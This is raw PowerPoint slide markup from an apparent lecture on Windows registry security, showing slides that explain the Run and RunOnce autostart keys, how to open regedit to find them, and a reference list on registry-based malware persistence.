              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Keys  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11479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gn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t> keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>in the registry on Windows operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>softwareok.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>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28</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999615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2675467"/>
            <a:ext cx="8784975" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the Windows 11, 10, ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Windows + R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Use command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>regedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>navigate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is also a second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>key:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The entries in the second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>responsible for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>all Windows 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a: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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>softwareok.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2459503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Windows Registry: Malware Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows Registry attacks: Knowledge is the best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Red Canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>DarkWatchman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: A new evolution in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Matt Stafford and Sherman Smith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>15 Best Registry Hacks For Windows 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Harshaurya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Kaur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Articles of Windows Key Security</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564594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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example of the First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
